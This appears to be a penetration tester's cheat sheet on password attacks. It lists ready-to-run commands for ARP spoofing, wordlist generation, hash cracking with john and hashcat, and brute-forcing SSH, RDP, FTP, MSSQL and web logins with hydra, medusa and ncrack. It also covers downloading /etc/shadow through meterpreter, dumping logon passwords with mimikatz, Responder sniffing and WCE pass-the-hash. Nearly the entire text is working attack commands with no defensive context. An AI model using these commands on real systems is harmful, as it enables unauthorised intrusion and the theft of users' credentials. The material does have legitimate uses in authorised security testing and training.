Passwords


# ARP spoofing

echo 1 >> /proc/sys/net/ipv4/ip_forward
arpspoof [-i interface] -t [target] [gateway]
arpspoof -i eth0 -t 10.0.0.10 10.0.0.1
------------------------------------------------------------------------------------------------------

# Create a word list

- Scrape words from a webpage
cewl http://targetIP/joomla/ > passwords.txt

- Start with a bsase word
crunch <min characters> <max character> [options]
Example: apple is the base word. The password is 7 characters long, insert symbols then numbers
crunch 7 7 -t apple^% -o passwords.txt
------------------------------------------------------------------------------------------------------

# Cracking

john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt <Windows hash file>

hashcat -m 1000 -a 0 --force --show --username <Windows hash file> /usr/share/wordlists/rockyou.txt     (username:hash:password)
hashcat -m 1500 -a 0 --force --show --username <Linux hash file> /usr/share/wordlists/rockyou.txt       (username:hash:password)
hashcat -m 5600 <Responder hash> /usr/share/wordlists/rockyou.txt

hydra -L <username list> -P <password list> -M <target list> <protocol>
hydra -l <username> -p <password> <target> <protocol>
hydra -l root -P /usr/share/wordlists/rockyou.txt -M 3389.txt rdp
hydra -l root -P list.txt 10.0.0.10 ssh

hydra -l administrator -p admin -M targets.txt http-form-post "/teamquest/cgi-bin/login:username=^USER^&pass=^PASS^:S=302 Found" -s 2780
hydra -l administrator -p admin 10.0.0.10 http-form-post "/teamquest/cgi-bin/login:username=^USER^&pass=^PASS^:S=302 Found" -s 2780

medusa -h <targetIP> -u <username> -P <password list> -M <module>
medusa -h <targetIP> -u sa -P john.txt -M mssql

medusa -h 10.0.0.10 -u user -P passwords.txt -M ftp       FTP user with password list
ncrack -vv --user offsec -P passwords rdp://10.0.0.10     RDP user with password list
hydra -l user -P pass.txt -t 10 10.0.0.10 ssh -s 22       SSH user with password list
------------------------------------------------------------------------------------------------------

# Crack Linux password hashes

meterpreter > download /etc/passwd
meterpreter > download /etc/shadow

unshadow passwd shadow > tmp

john --wordlist /usr/share/wordlists/rockyou.txt tmp
------------------------------------------------------------------------------------------------------

# Dump hashes with mimikatz

meterpreter > upload /usr/share/mimikatz/x64/mimikatz.exe c:\\
meterpreter > upload /usr/share/mimikatz/x64/mimikatz.sys c:\\
meterpreter > upload /usr/share/mimikatz/x64/sekurlsa.dll c:\\

meterpreter > shell

mimikatz.exe
priviledge::debug
sekurlsa::logonPasswords
------------------------------------------------------------------------------------------------------

# Sniffing

responder -I eth0 -w
------------------------------------------------------------------------------------------------------

# Windows Credential Editor (WCE)

How do I change my current NTLM credentials?
wce.exe -s <username>:<domain>:<lmhash>:<nthash>

How do I create a new logon session and launch a program with new NTLM credentials?
wce.exe -s <username>:<domain>:<lmhash>:<nthash> -c <program>

How can I generate NTLM hashes with WCE? (for testing purposes)
wce.exe -g <cleartext password>

How can I write hashes obtained by WCE to a file?
wce.exe -o hashes.txt

